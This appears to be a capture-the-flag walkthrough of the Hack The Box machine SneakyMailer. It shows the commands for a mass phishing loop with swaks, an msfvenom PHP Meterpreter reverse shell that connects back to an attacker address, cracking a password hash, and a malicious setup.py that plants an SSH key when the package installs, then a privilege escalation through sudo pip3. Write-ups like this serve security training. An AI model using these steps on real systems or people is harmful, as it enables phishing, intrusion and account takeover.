This article provides a detailed walkthrough of the SneakyMailer challenge on Hack The Box. You will learn how to obtain a list of email addresses, send a phishing email, deploy a PHP shell via FTP, execute arbitrary code using PyPI, and escalate privileges via GTFOBins pip3.
The article demonstrates the process of obtaining a list of email addresses, executing a phishing email campaign, deploying a PHP shell via FTP, executing arbitrary code using PyPI, and escalating privileges via GTFOBins pip3.
This machine has an IP address of 10.10.10.197, which I add to /etc/hosts.
10.10.10.197 sneakymailer.htb
First, a scan for open ports is performed.
#!/bin/bash ports=$(nmap -p- --min-rate=500 $1 | grep ^[0-9] | cut -d '/' -f 1 | tr '\n' ',' | sed s/,$//) nmap -p$ports -A $1
10.10.10.197 sneakycorp.htb
On the website you can find a list of employees and their corresponding emails.
To get all email addresses we use email extractor.
Now we open port 80 and multicast phishing emails using the swaks tool.
while read mail; do swaks --to $mail --from [email protected] --header 'Subject: News' --body 'Look it: http://10.10.14.114/' --server sneakymailer.htb | grep 'To:' ; done < emails.txt
And we see that some user clicks on our link.
Let’s decode the data.
We get a password with which we can log in to the mail server.
We use Evolution as a client.
We enter the password when connecting and see two letters.
One of the emails revealed the password for a developer account (suitable for FTP access) and a mention of PyPI associated with the user low.
After logging into FTP and receiving some files, we notice that these are the source codes of the site.
Let’s add the dev subdomain to /etc/hosts.
10.10.10.197 dev.sneakycorp.htb
The data obtained allows us to place a PHP shell on the server. For this, we use a payload. In this case, Meterpreter was chosen as the payload.
msfvenom -p php/meterpreter_reverse_tcp LHOST=10.10.14.114 LPORT=4321 -f raw > r.php cat r.php | xclip -selection clipboard && echo '<?php ' | tr -d '\n' > r.php && xclip -selection clipboard -o >> r.php
After placing the file in the dev directory, let’s run the listoner.
handler -p php/meterpreter_reverse_tcp -H 10.10.14.114 -P 4321
After accessing our file, we get an active session.
hashcat --example | grep '$apr1' -A2 -B2
hashcat -m 1600 -a 0 pypi.hash ./tools/rockyou.txt
We will also add the found subdomain to /etc/hosts.
10.10.10.197 pypi.sneakycorp.htb
Installing your own package allows you to execute arbitrary code. Here is a good tutorial on creating a python package. First, let’s create a directory.
Now you need to create the following files: init.py, .pypirc, README.md, setup.cfg, and setup.py. The setup.py file will contain the executable code. Example code for the setup.py file that writes the SSH key to the user low.
from setuptools import setup try: f = open('/home/low/.ssh/authorized_keys', 'a') f.write('ssh-rsa ... ') f.close() except: setup( name='ralfpack', packages=['ralfpack'], description='R', version='0.1', url='http://pypi.sneakymailer.htb:8080/ralfpack', author='ralf', author_email='[email protected]', keywords=['pip','ralfpack','example'] )
We create __init__.py (so that it exists), an empty README.md and setup.cfg (we specify README.md in it).
And all that’s left is to create a .pypirc file. We specify the package name and configuration for it.
We upload all files to the host.
Let’s get a normal shell and assemble our package.
python3 -c 'import pty;pty.spawn("/bin/bash")' python3 setup.py sdist
Now let’s download it.
python3 setup.py sdist upload -r ralfpack
The key has been successfully uploaded, and you can now connect to SSH using the private key to access the low user account.
Analysis of sudo settings revealed that the pip3 command can be executed with root privileges. This opens up the possibility of privilege escalation through the exploitation of pip3 functionality.
We turn to GTFOBins and see instructions for obtaining a shell.
We repeat and get a shell on behalf of root.
This article describes the completion of the SneakyMailer task on Hack The Box using modern cybersecurity techniques. We demonstrate how, through network port analysis, phishing mailing, PHP shell deployment, and working with PyPI, you can gain access to accounts and elevate privileges. The final stage is to use the sudo capabilities to run pip3 with administrator rights, which opens the way to full control over the system. The article is useful for understanding the practical aspects of information security.